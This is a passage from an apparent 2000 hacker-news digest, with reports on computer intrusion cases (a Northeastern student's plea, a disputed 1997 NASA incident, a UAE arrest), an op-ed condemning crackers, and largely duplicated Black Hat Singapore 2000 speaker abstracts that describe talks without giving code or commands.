To sign up for Ultimate Hacking: Black Hat Edition, interested persons should visit the Black Hat web site at www.blackhat.com.

About Foundstone

Foundstone Inc., headquartered in Irvine, California, is the premier computer security training and consulting company.
Foundstone's team of experts have thwarted hackers for years at the highest corporate and government levels, including three of the Big Five accounting firms, the United States Air Force, and defense contractors for classified Department of Defense projects such as the B-2 Stealth Bomber. Foundstone's multi-pronged approach to preventing computer crime involves building security expertise within corporations through training, attack and penetration testing, and incident-response assessment. Using these methods, Foundstone has secured the computer operations of leading dot-coms and Global 2000 companies across a wide range of industries. Contact Foundstone at 877/91-FOUND or visit www.foundstone.com.

About Black Hat Briefings 2000

The Black Hat Briefings conference series brings together corporate security professionals and the ``underground'' security experts who develop the tools used by and against hackers. By tradition, the Black Hat Briefings are held in Las Vegas during the days immediately preceding DEF CON, the largest hacker convention in the U.S. This year, the Black Hat Briefings are July 26-27, with DEF CON 8.0 following on July 28-30. The Black Hat Briefings conference is an ``in the trenches'', vendor-neutral gathering where administrators, engineers, and programmers learn about the latest developments in hacking and computer security, giving them a no-nonsense way to protect their networks and systems in the real world. For more information visit www.blackhat.com.

Foundstone, Inc. -- Securing the Dot Com World

--------------------------------------------------------------------------------

Contact: Foundstone, Inc.
Nico Sell, 650/456-0943
nico@foundstone.com

@HWA

282.0 [IND] Student Admits Hacking U.S. Government Computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_063000a_j.shtml
6/30/00

Student Admits Hacking U.S. Government Computers

BOSTON (Reuters) - A university student admitted in Boston federal court to breaking into U.S. government computers including Defense Department and NASA systems.

Ikenna Iffih, a student at Northeastern University's College of Computer Science, pleaded guilty to a series of coast-to-coast cyber attacks before U.S. District Judge Robert Keeton late on Thursday.

Under a plea deal, Iffih faces up to 20 years in prison with a possible mandatory minimum sentence of six months, a fine of up to $750,000 and three years of supervised release when sentenced on Oct. 25.

The 29-year-old student also admitted hacking into Zebra Marketing Online Services (ZMOS), a Washington-state based company that provides Web service to other firms. Court papers showed the Bainbridge Island company near Seattle lost more than $30,000 and took about 42 hours to return to minimal operations during the April 1999 attack.

FBI agents, after obtaining about 20 court orders, were able to trace the break-ins to the NASA (National Aeronautics and Space Administration) computer, the Defense Department's Logistics Agency computer, and ZMOS system to the personal computer in Iffih's Boston home.

``All in all, the defendant used his home computer to leave a trail of cybercrime from coast to coast,'' U.S. Attorney for Massachusetts Donald Stern said in a statement.

@HWA

283.0 [IND] Hacker may have endangered astronauts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_070300a_j.shtml
7/03/00

Hacker May Have Endangered Astronauts
By The Associated Press
Special to CNET News.com
July 2, 2000, 6:00 p.m. PT
http://news.cnet.com/news/0-1005-200-2194575.html

LONDON--A computer hacker endangered shuttle astronauts in 1997 by overloading NASA's communication system, according to a report.
As the shuttle docked at the Russian space station Mir, a hacker tapped into the National Aeronautics and Space Administration computer system that monitors the heartbeat, pulse and medical condition of astronauts aboard the spacecraft, the British Broadcasting Corp. reported today.

"We had an activity at NASA center where a hacker was overloading our system...to such an extent that it interfered with communications between the NASA center, some medical communications and the astronaut aboard the shuttle," Roberta Gross, inspector general at NASA, said in a BBC documentary to be aired tomorrow.

NASA was forced to switch systems and talk to the astronauts via the space station.

The report was released ahead of the premiere of "Cyber Attack," which looks at how hackers are able to penetrate the defense systems of such countries as the United States and Britain.

Gross said NASA has numerous fail-safe measures to ensure communications, "but it shows the potential hackers have for doing some real damage to NASA's mission and astronaut safety."

In the past year, NASA has experienced more than 500,000 cyberattacks, the report said.

"Everybody knows if there's a problem at Houston, a potential vulnerability or someone is able to supersede the system we set up, that's dangerous," Gross said.

Astronaut Michael Foale, who was part of the 1997 mission, told the BBC he was not informed of the problems at the time but found the revelations intriguing.

Copyright © 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed.
@HWA

284.0 [IND] Accused UAE Hacker Files Defamation Lawsuit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_070300b_j.shtml
7/03/00

Accused UAE Hacker Files Defamation Lawsuit
By Steve Gold, Newsbytes

DUBAI, UNITED ARAB EMIRATES, 03 Jul 2000, 1:20 PM CST

A British man who was arrested in mid-June, suspected of hacking into the United Arab Emirates' (UAE's) Internet system, has sued the telecommunications company instrumental in his arrest.

The unnamed 21-year-old, originally from the UK, was arrested in mid-June and was expected to be charged with damaging the country's economy, a serious offense that carries up to a 10-year prison sentence.

The 21-year-old man, who works as a senior computer engineer in Dubai, was traced by Etisalat's network security staff. He was released after 24 hours in jail and has not yet been charged.

The case is thought to be the first computer hacking case in the Middle East. Like many countries in the region, the UAE has no computer security legislation in place.

In press reports after the arrest, Etisalat officials blamed the suspected hacker for much of the disruption that has been experienced by local Internet subscribers in the past two weeks.

Some local media reports appear to have revealed sufficient information for the man to be identified by people in the UAE computer industry. As a result of this, his lawyer, Habib al-Mulla, told reporters over the weekend that his client was filing for defamation.

The lawyer has also applied for copies of Etisalat's records from when the alleged sabotage on its computer systems took place.

Reports suggest that Etisalat will appear in court on July 9 to offer its defense in the defamation case.

If charges are made, al-Mulla's client could face up to 10 years in prison, although media reports suggest that he will only face up to six months, as well as fines approaching $2,750.

Etisalat's Web site is at http://www.etisalat.co.ae .
@HWA

285.0 [IND] NASA Denies Hacker Attack Danger
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_070500a_j.shtml
7/05/00
http://dailynews.yahoo.com/h/ap/20000703/tc/nasa_hacker_1.html

Monday July 3 7:38 PM ET

NASA Denies Hacker Attack Danger
By DAVID HO, Associated Press Writer

WASHINGTON (AP) - NASA officials denied reports Monday that a computer hacker attack in 1997 endangered astronauts by disrupting communications with the space shuttle Atlantis.

The British Broadcasting Corp. had reported that during a rendezvous with the Russian space station Mir, a hacker interfered with communications and forced the shuttle crew to use the Russian station to maintain contact with NASA.

``At no point did ground controllers lose contact with the astronauts. That never happened,'' said National Aeronautics and Space Administration spokesman Bob Jacobs.

He also said the astronauts never used the Russian space station as a communications relay. The BBC could not immediately be reached for comment.

Jacobs did confirm a hacker had delayed the transmission of astronaut medical data between NASA computer systems on the ground, but backup systems corrected the problem. The medical information had already been sent down from the shuttle and was being distributed to different locations.
``People try to hack into the system constantly, but any mission critical computer system is insulated from the communications network,'' he said, noting that hackers had made about 500,000 attacks against the space agency in the last year.

Jacobs said NASA's headquarters didn't know who had conducted the attack, but the agency's inspector general is investigating the incident.

The BBC report was released in advance of a documentary aired Monday called ``Cyber Attack,'' which looked at how hackers penetrate the computer defenses of countries like the United States and Britain.

The BBC reported that Roberta Gross, NASA inspector general, said, ``We had an activity at NASA center where a hacker was overloading our system ... to such an extent that it interfered with communications between the NASA center, some medical communications and the astronaut aboard the shuttle.''

Jacobs said Gross had been referring to the disruption on the ground and not any problem communicating with the astronauts.

During the September 1997 mission, the space shuttle Atlantis retrieved astronaut Michael Foale, who had spent 134 days aboard Mir.

Last Thursday, a former computer science student of Northeastern University pleaded guilty to going on a hacking spree against private and government targets, including the military and NASA. Ikenna Iffih, 20, broke into computers at NASA's Goddard Space Flight Center in Greenbelt, Md. and installed a program to capture users' names and passwords.

- On the Net:

The National Aeronautics and Space Administration: http://www.nasa.gov
BBC program Panorama: http://news.bbc.co.uk/hi/english/events/panorama/

@HWA

286.0 [IND] 'Houston, We Don't Have A Problem.'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_070500b_j.shtml
7/05/00

'Houston, We Don't Have A Problem.'
By David McGuire, Newsbytes

WASHINGTON, D.C., U.S.A., 03 Jul 2000, 5:05 PM CST

NASA today refuted media reports that earth-based hacker activities endangered the lives of astronauts on Space Shuttle Atlantis during a 1997 mission.

Responding to a BBC report indicating that a hacker attack on NASA communications systems had somehow interfered with Mission Control's ability to monitor the astronauts' vital statistics, NASA today said that the Atlantis crew was never in any danger.

"Two ground-based computers were delayed in talking to each other (as a result of the 1997 hack) and in fact, the transmission went through," NASA spokesperson Ed Campion said today. The hack had no effect on "information that was flowing up to, or down from, the space shuttle," Campion said.

In a report earlier today, Reuters quoted NASA Inspector General Robin Gross as telling the BBC that the hacker attack so disabled NASA computers as to jeopardize shuttle-to-ground communications.

But while Campion today confirmed that NASA suffered a hacker attack during the September 1997 Atlantis mission, he contended that shuttle-to-ground communications systems are walled off from the Internet and are "very well protected."

"You have to be in the (Mission Control) building to have access to those systems," Campion said.

The information transfer that was delayed by the attack was a "routine" medical communication between Houston-based Mission Control and another NASA location, Campion said.

The 1997 attack remains under investigation by NASA's Inspector General, Campion said.

@HWA

287.0 [IND] Crackers are Common Criminals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_070500c_j.shtml
7/05/00

Crackers are Common Criminals
By: Andrew Thomas
Posted: 04/07/2000 at 17:47 GMT

Hackers have a certain romantic image - it's a bit like Robin Hood; the small man against the machine; the righter of wrongs, that sort of thing.
On British TV the other night, a young hacker from Wales was asked why he had broken into a computer and downloaded several thousand people's bank details. He replied that he had done it to prove that the bank's security procedures were inadequate. It should have been obvious that he had no criminal intent and naturally hadn't done anything with the downloaded details. If he hadn't done it, someone else would have.

You are a judge. Before you in the court stands a pimply-faced youth with greasy hair and an ill-advised vestigial beard. He stands accused of breaking into several dozen houses and stealing credit card details and address books. The address books were used to identify future properties to burgle and, whilst in each house, he burnt all the personal correspondence he could find.

His defence? "I only did it to prove that the locks on these people's doors were inadequate. If I hadn't done it, someone else would. It's the lock makers' fault."

Do you, the judge, dismiss the charges and commend the young chap for his public-spiritedness, whilst roundly condemning locksmiths for their sloppy workmanship? Or do you sentence him to a public flogging and then send him to choky?

Spinal Tap

Another housebreaker stands accused of a number of break-ins where he stole expensive stereo systems and CD collections. In mitigation, he blames Metallica, Napalm Death and Spinal Tap for making him do it. The reasoning is obvious - if these bands hadn't recorded unencrypted music onto CDs in the first place, he wouldn't have been tempted to pop into other people's houses while they were out and remove them. And he needed the stereo systems to play them on. And the beer from the fridge. And the car to carry it all away in.

In what way is hacking into a computer any different from breaking into a house? Both are private property. Locks on doors are only necessary because there are people who can't be bothered to work.
They would much rather you worked hard to buy things that they could later remove while you were out earning more money. Faulty locks are not the issue here - criminals are.

So why is it always Microsoft that gets blamed for making it too easy for the criminals? Why aren't Compaq, Dell, IBM, Intel and AMD to blame for providing the systems the hackers break into? For that matter, why aren't the telcos and ISPs guilty, too? Do we read stories about Sony being accused that its TVs and videos are encouraging break-ins because you can't bolt them to the floor?

Of course Microsoft is a very successful company headed up by very rich people, so envy is probably a key factor here. But surely Microsoft is only exposed to hack attacks to the degree it is because millions of people actually like its products and want to use them. They don't want functionality removed, they want criminals to leave them alone.

A hack attack on a Word or Outlook user is surely criminal trespass on their (electronic) property in exactly the same way it is if a burglar breaks into their house. It doesn't matter how easy or hard it is - it's still wrong. Stop blaming Microsoft - it's the hackers who are the guilty ones. ®

http://www.theregister.co.uk/content/1/11763.html

@HWA

288.0 [IND] Black Hat Briefings - Singapore, May 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7/05/00

Black Hat Briefings - Singapore, May 2000

This stuff is GOOD. Speaker presentations in PowerPoint, Audio and Video are available at:

http://www.blackhat.com/html/bh-asia-00/bh-asia-00-speakers.html

SPEAKERS

There will be approximately 14 speakers over two days, including a moderated panel discussion.

5/02/00 Presentation materials now on-line. A/V is encoding this week.

The goal of the talks is to inform the audience about current system vulnerabilities and fixes as well as future areas of concern.
We cover a broad range of security issues from the perspective of the network administrator, system cracker, and IS managers. Because of our unique speakers, the Black Hat Briefings will offer the audience a deep insight into the real security issues facing your network, with no vendor pitches!

--------------------------------------------------------------------------------

Greg Hoglund - Rootkit.com
Advanced Buffer Overflow Techniques

This is a technical talk aimed at people who have already been exposed to buffer overflows and want to learn more. The talk assumes the audience has at least some knowledge of CPUs and processes. For those of you who already understand buffer overflows, this talk will be a refreshing discourse on technique. We will show how the injection method can be decoupled from the payload. We then explore the details and challenges of injecting code into a remote process. We will also explore the payload, the encoding methods, and how to dynamically load new functions. Lastly, we discuss the possible effects of a payload, including network worms, viruses, and rootkits.

Greg Hoglund is a software engineer and researcher. His most notable achievement was the creation of the Asmodeus Security Scanner, a Windows NT based port scanner and ethernet sniffer, which he later sold to Webtrends, Corp. Additionally, Hoglund has written several white papers on content based attacks, kernel patching, and forensics. He currently works as a researcher for Tripwire Security Systems, exploring forensics issues.

Their Presentation! (PowerPoint 247k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Batz - Independent Security Researcher.
Casing the Joint. What we already know about your network.

An overview of what an attacker already knows about your network.
The information is described using an ASN.1 template for possible integration into autonomous agents, conspicuously similar to the ones described in Caezar's presentation.

Batz is an independent security researcher and Evil Super Villain who caused a stir last year by bringing to light some serious concerns with BGP4 configuration and implementation at Black Hat Briefings '99 in Las Vegas, Nevada.

Their Presentation! (PowerPoint 86k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Mudge - VP of R&D for @Stake.
An analysis of tactics used in discovering "passive" monitoring devices.

Formerly CEO and Chief Scientist at renowned "hacker think tank" the L0pht, Mudge is considered one of the nation's leading "grey-hat hackers". He, along with the other members of the L0pht, is now heading up @Stake's research labs, ensuring that the company is at the cutting edge of Internet security. Mudge is a widely sought after keynote speaker in various forums, including analysis of electronic threats to national security. He has been called to testify before the Senate Committee on Governmental Affairs, has briefed a wide range of members of Congress and has conducted training courses for the Department of Justice, NASA, the US Air Force, and other governmental agencies.

A recognized name in cryptanalysis, Mudge has co-authored papers with Bruce Schneier that were published in the 5th ACM Conference on Computer and Communications Security, and the Secure Networking - CQRE International Exhibition and Congress. He is the original author of L0phtCrack, the award winning NT password auditing tool. In addition, Mudge co-authored Anti-Sniff, the world's first commercial remote promiscuous mode detection program. He has written over a dozen advisories and various tools -- many of which resulted in numerous CERT advisories, vendor updates, and patches.
--------------------------------------------------------------------------------

Caezar - Malicious Information Gathering

As in physical surveillance, information can be gathered about a target network without penetrating its security perimeter. Using computer virus and worm techniques to surround the target, an opponent can monitor and collect web and e-mail traffic. Critical business communications could be altered in transit or halted altogether. This discussion will cover independent autonomous agents, information filtering and malicious code propagation.

Their Presentation! (PowerPoint 92k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Jeremy Rauch - UN*X Security Specialist, Security-Focus.com.
Dave Ahmad - UN*X Security Specialist, Security-Focus.com.
Routers, Switches & more: The glue that binds them all together.

By now, anyone with an inkling about security knows that they need to protect their assets. We've all heard we need a firewall, and we all know that we need to lock down machines. What about the glue that binds them all together? The routers, switches, network administration protocols, authentication protocols...what about that stuff? This talk will go into the security flaws you don't even think about, don't realize are there, or have dismissed as being inconsequential.

Jeremy Rauch has been involved in discovering and researching security vulnerabilities from a number of different perspectives. Working with vendors, he has identified and helped fix over two dozen major security vulnerabilities. Jeremy is currently a developer at one of the largest security vendors, where part of his duties include the identification and reporting of security risks. Jeremy is also one of the founders of Security Focus, Inc., a centralized online security resource offering security news, products, events, books, tools, and one of the most comprehensive vulnerability listings on the net.

Dave has been working with network and Unix security for a number of years and is a founding member of Security-Focus.com. He has dealt with both general Unix auditing and intrusion detection as well as secure software development. Dave is the co-host of Info.Sec.Radio, a radio show airing twice a month on both a Canadian radio station and the Internet via a RealAudio stream.

Their Presentation! (PowerPoint 208k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Marcus Ranum - CEO Network Flight Recorder.
Intrusion Detection and Network Forensics.

Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been specializing in Internet security since he built the first commercial firewall product in 1989. He has acted as chief architect and implementor of several other notable security systems including the TIS firewall tool kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight Recorder. Marcus frequently lectures on Internet security issues, and is co-author of the "Web Site Security Sourcebook" with Avi Rubin and Dan Geer, published by John Wiley and Sons.

Their Presentation! (PowerPoint 199k) (Long Version - PowerPoint 460k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

JD Glaser - CEO of NT Objectives.
Auditing NT

This talk will be the third in a series to address the issue of auditing an NT box after a break-in. Specifically, we will extend our look under the hood to find places where altered files can hide as well as examine the evidence left behind by an intruder. This talk will also cover a set of tools that can uncover various hidden aspects of NT's internal state.
NT's built-in tools are not sufficient in most cases for examining system state, so this talk includes a small tutorial on a suite of free tools I have made to aid Windows NT intrusion research. Details will include:

Examining NTFS file time stamping
Examining NT driver behavior
Examining permissions/file attributes
Examining COM security backdoors
Part III: Looking for trojan behavior
Part III: Finding backdoors in Windows NT

JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools for Windows NT, most notably NTLast and Forensic Toolkit, which are free tools for the security community. He is an MCSE/MCSD who specializes in contract DCOM programming and NT network security. Clients have included Intel, HP, Columbia Sportswear and Tripwire. Latest projects have involved NTFS file system code for Tripwire for NT and file system filters for real-time detection systems for NT that bypass NT's untrusted API.

Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Jennifer Granick - Attorney at Law.
International Legal issues surrounding computer hacking.

A global computer network poses special questions in computer crime prevention and punishment. There is no international consensus on what a computer crime is or what should be prohibited conduct. Nor are there agreements on procedural matters such as transborder searches, data preservation, standard of proof or jurisdiction. This presentation will review the points of contention, discuss current efforts towards obtaining consensus and highlight the benefits and detriments of international consensus to investigators and civil libertarians alike.

Jennifer Stisa Granick is a defense lawyer practicing in the areas of high tech and computer crime from her office in San Francisco.
She defends unauthorized access, trade secret theft, and email interception cases nationally. Granick has written articles on wiretapping, workplace privacy and trademark law for Wired. Additionally, she has spoken at previous Black Hat Briefings and to NASA computer security professionals about computer crime laws, digital forensics and evidence collection.

Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Martin Khoo - Assistant Director, Incident Handling, SingCERT
Responding to Cyber Threats.

IT and the Internet are fast becoming important parts of our national competitiveness. With the emerging globalization and worldwide connectivity, Internet security threats in other parts of the world can quickly translate into security issues that are potentially damaging to the local IT community. It is crucial for Singapore to be able to respond efficiently and effectively to Internet computer incidents and security breaches. It is important to have a localized CERT effort that offers security incident resolution services in a timely and effective manner. This talk will introduce the Singapore Computer Emergency Response Team (SingCERT) and cover the various programmes and initiatives that SingCERT offers to its constituency. It will also touch on the experience and lessons learnt through the handling and resolution of security incidents and highlight some of the trends in incidents reported to SingCERT.

Martin is an Assistant Director with the Infocomm Development Authority (IDA) of Singapore. He takes charge of security incident management, where he oversees a group of IT Security Consultants in providing security services to the various government organizations.
He is also the Programme Manager of the Singapore Computer Emergency Response Team (SingCERT), which is the national level security incident response center charged with the prevention, detection and resolution of computer security incidents on the Internet and Singapore ONE. He manages a group of Security Consultants providing incident resolution and security awareness promotion services to the local IT industry and the general IT users. Martin is a frequent speaker on subjects regarding security and incident handling. He last spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" organized by CommerceNet Singapore in October 1999.

Their Presentation! (PowerPoint 107k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Pierre Noel - CEO of ICSA.net Asia Pacific
Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack)

Why are so many companies, organizations and agencies regularly hacked? Some of these regularly hacked organizations have however invested huge amounts in crafting their IT architectures. Security products, both hardware and software, are available off-the-shelf. Some of them underwent strong security certifications, and they are widely used in the Internet, even by the companies mentioned above. So, what's wrong with the strategy?

In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out of the five most important inhibitors were security-related; the same survey in '99 showed these security-related inhibitors pushed back to rank 20 to 50! Does this mean that security is no longer an inhibitor to eCommerce? Or does this imply something else?

Prior to the Second World War, the French Army erected the Maginot Line to protect themselves against invasion. Pride of the nation, the Maginot Line proved to be totally useless, and the invasion of France took place at a very rapid pace.
Can we possibly transpose this story to the IT world? With a series of 'field' observations, Pierre will discuss the reasons for security weaknesses, and derive simple paths to reducing these exposures.

Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the president and founder of Burton & Brooks International, a consulting firm specialized in IT security for large enterprises and governments. As president of Burton & Brooks, Pierre is charged with the role of chief technical officer for the Hong Kong Post Public Key Infrastructure and Root Certification Authority project. Previously, Pierre was first the director of security best practice, Asia for PLATINUM technology, before he was promoted to vice president for Security Consulting Worldwide after Computer Associates' acquisition of PLATINUM. Pierre has more than 10 years of experience in providing independent consultancy worldwide. He specialized in the fields of Enterprise Security and large scale mission critical OLTP systems. Pierre was chief consultant and architect at the Open Software Foundation, then known as The Open Group.

Their Presentation! (PowerPoint 1,118k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore.
Computer Crime: The law enforcement perspective with case studies.

Their Presentation! (PowerPoint 497k)
See It! (surestream video file)
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Joey__ (a.k.a. Nishad Herath) - CTO of SecureSolv.com.
Advanced Windows NT Security.

In his talk, he will walk you through the exploitation of an unpublished real world Windows NT based buffer overflow exploit as an example, discussing the following:

* A reverse engineering approach to Windows NT software security exploration. How advanced tools like IDA and SoftICE can be utilised to analyze software and OS for vulnerabilities. (Who cares about source!)
* Advanced Win32 shellcode techniques and how the most protected systems can be broken with innovative shellcode (including shellcode techniques unpublished to date).
* Shellcode considerations specific to Windows NT (including issues unpublished to date).
* Protection from exploitation! Discussion of innovative new buffer overflow prevention technology and advanced backdooring prevention for Windows NT.

Joey__ is the CTO of SecureSolv.com, Sri Lanka's pioneering IT security consultancy firm specializing in IT security for e-Businesses, advanced security research, auditing, reverse-engineering services as well as technical consultancy for security products and services. With more than 6 years of experience in the industry, Joey__ specializes in Windows NT / Windows 2000 kernel architecture, security, system internals exploration, exploitation and intrusion protection techniques. His early work includes publishing the internal workings of the Windows NT Native Call Interface, which was undocumented at the time.
--------------------------------------------------------------------------------

Greg Hoglund - Rootkit.com

Advanced Buffer Overflow Techniques

This is a technical talk aimed at people who have already been exposed to
buffer overflows and want to learn more. The talk assumes the audience has at
least some knowledge of CPUs and processes. For those of you who already
understand buffer overflows, this talk will be a refreshing discourse on
technique. We will show how the injection method can be decoupled from the
payload. We then explore the details and challenges of injecting code into a
remote process. We will also explore the payload, the encoding methods, and how
to dynamically load new functions. Lastly, we discuss the possible effects of a
payload, including network worms, viruses, and rootkits.

Greg Hoglund is a software engineer and researcher. His most notable achievement
was the creation of the Asmodeus Security Scanner, a Windows NT based port
scanner and ethernet sniffer, which he later sold to Webtrends, Corp.
Additionally, Hoglund has written several white papers on content based attacks,
kernel patching, and forensics. He currently works as a researcher for Tripwire
Security Systems, exploring forensics issues.

Their Presentation! (PowerPoint 247k) / See It! (surestream video file) /
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Batz - Independent Security Researcher.

Casing the Joint. What we already know about your network.

An overview of what an attacker already knows about your network. The
information is described using an ASN.1 template for possible integration into
autonomous agents, conspicuously similar to the ones described in Caezar's
presentation.

Batz is an independent security researcher and Evil Super Villain who caused a
stir last year by bringing to light some serious concerns with BGP4
configuration and implementation at Blackhat Briefings 99 in Las Vegas, Nevada.

Their Presentation! (PowerPoint 86k) / See It! (surestream video file) /
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Mudge - VP of R&D for @Stake.

An analysis of tactics used in discovering "passive" monitoring devices.

Formerly CEO and Chief Scientist at the renowned "hacker think tank", the
L0pht, Mudge is considered one of the nation's leading "grey-hat hackers". He,
along with the other members of the L0pht, is now heading up @Stake's research
labs, ensuring that the company is at the cutting edge of Internet security.
Mudge is a widely sought after keynote speaker in various forums, including
analysis of electronic threats to national security. He has been called to
testify before the Senate Committee on Governmental Affairs, has briefed a wide
range of members of Congress and has conducted training courses for the
Department of Justice, NASA, the US Air Force, and other governmental agencies.
A recognized name in cryptanalysis, Mudge has co-authored papers with Bruce
Schneier that were published in the 5th ACM Conference on Computer and
Communications Security, and the Secure Networking - CQRE International
Exhibition and Congress. He is the original author of L0phtCrack, the award
winning NT password auditing tool. In addition, Mudge co-authored Anti-Sniff,
the world's first commercial remote promiscuous mode detection program. He has
written over a dozen advisories and various tools -- many of which resulted in
numerous CERT advisories, vendor updates, and patches.

--------------------------------------------------------------------------------

Caezar - Malicious Information Gathering

As in physical surveillance, information can be gathered about a target network
without penetrating its security perimeter. Using computer virus and worm
techniques to surround the target, an opponent can monitor and collect web and
e-mail traffic.
Critical business communications could be altered in transit or halted
altogether. This discussion will cover independent autonomous agents,
information filtering and malicious code propagation.

Their Presentation! (PowerPoint 92k) / See It! (surestream video file) /
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Jeremy Rauch - UN*X Security Specialist, Security-Focus.com.
Dave Ahmad - UN*X Security Specialist, Security-Focus.com.

Routers, Switches & more: The glue that binds them all together.

By now, anyone with an inkling about security knows that they need to protect
their assets. We've all heard we need a firewall, and we all know that we need
to lock down machines. What about the glue that binds them all together? The
routers, switches, network administration protocols, authentication
protocols... what about that stuff? This talk will go into the security flaws
you don't even think about, don't realize are there, or have dismissed as being
inconsequential.

Jeremy Rauch has been involved in discovering and researching security
vulnerabilities from a number of different perspectives. Working with vendors,
he has identified and helped fix over two dozen major security vulnerabilities.
Jeremy is currently a developer at one of the largest security vendors, where
part of his duties include the identification and reporting of security risks.
Jeremy is also one of the founders of Security Focus, Inc., a centralized
online security resource offering security news, products, events, books,
tools, and one of the most comprehensive vulnerability listings on the net.

Dave has been working with network and Unix security for a number of years and
is a founding member of Security-Focus.com. He has dealt with both general Unix
auditing and intrusion detection as well as secure software development. Dave
is the co-host of Info.Sec.Radio, a radio show airing twice a month on both a
Canadian radio station and the Internet via a RealAudio stream.

Their Presentation! (PowerPoint 208k) / See It! (surestream video file) /
Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Marcus Ranum - CEO, Network Flight Recorder.

Intrusion Detection and Network Forensics.

Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been specializing
in Internet security since he built the first commercial firewall product in
1989. He has acted as chief architect and implementor of several other notable
security systems including the TIS firewall tool kit, TIS Gauntlet firewall,
whitehouse.gov, and the Network Flight Recorder. Marcus frequently lectures on
Internet security issues, and is co-author of the "Web Site Security
Sourcebook" with Avi Rubin and Dan Geer, published by John Wiley and Sons.

Their Presentation! (PowerPoint 199k) (Long Version - PowerPoint 460k) /
See It! (surestream video file) / Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

JD Glaser - CEO of NT Objectives.

Auditing NT

This talk will be the third in a series to address the issue of auditing an NT
box after a break-in. Specifically, we will extend our look under the hood to
find places where altered files can hide, as well as examine the evidence left
behind by an intruder. This talk will also cover a set of tools that can
uncover various hidden aspects of NT's internal state. NT's built-in tools are
not sufficient in most cases for examining system state, so this talk includes
a small tutorial on a suite of free tools I have made to aid Windows NT
intrusion research.
Details will include:

  Examining NTFS file time stamping
  Examining NT driver behavior
  Examining permissions/file attributes
  Examining COM security backdoors
  Part III: Looking for trojan behavior
  Part III: Finding backdoors in Windows NT

JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools for
Windows NT, most notably NTLast and Forensic Toolkit, which are free tools for
the security community. He is an MCSE/MCSD who specializes in contract DCOM
programming and NT network security. Clients have included Intel, HP, Columbia
Sportswear and Tripwire. Latest projects have involved NTFS file system code
for Tripwire for NT and file system filters for real-time detection systems for
NT that bypass NT's untrusted API.

Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) /
See It! (surestream video file) / Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Jennifer Granick - Attorney at Law.

International Legal issues surrounding computer hacking.

A global computer network poses special questions in computer crime prevention
and punishment. There is no international consensus on what a computer crime is
or what should be prohibited conduct. Nor are there agreements on procedural
matters such as transborder searches, data preservation, standard of proof or
jurisdiction. This presentation will review the points of contention, discuss
current efforts towards obtaining consensus and highlight the benefits and
detriments of international consensus to investigators and civil libertarians
alike.

Jennifer Stisa Granick is a defense lawyer practicing in the areas of high tech
and computer crime from her office in San Francisco. She defends unauthorized
access, trade secret theft, and email interception cases nationally. Granick
has written articles on wiretapping, workplace privacy and trademark law for
Wired. Additionally, she has spoken at previous Black Hat Briefings and to NASA
computer security professionals about computer crime laws, digital forensics
and evidence collection.

Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) /
See It! (surestream video file) / Hear it! Real Audio (28k-isdn surestream)

--------------------------------------------------------------------------------

Martin Khoo - Assistant Director, Incident Handling, SingCERT

Responding to Cyber Threats.

IT and the Internet are fast becoming important parts of our national
competitiveness. With the emerging globalization and worldwide connectivity,
Internet security threats in other parts of the world can quickly translate
into security issues that are potentially damaging to the local IT community.
It is crucial for Singapore to be able to respond efficiently and effectively
to Internet computer incidents and security breaches. It is important to have a
localized CERT effort that offers security incident resolution services in a
timely and effective manner. This talk will introduce the Singapore Computer
Emergency Response Team (SingCERT) and cover the various programmes and
initiatives that SingCERT offers to its constituency. It will also touch on the
experience and lessons learnt through the handling and resolution of security
incidents and highlight some of the trends in incidents reported to SingCERT.

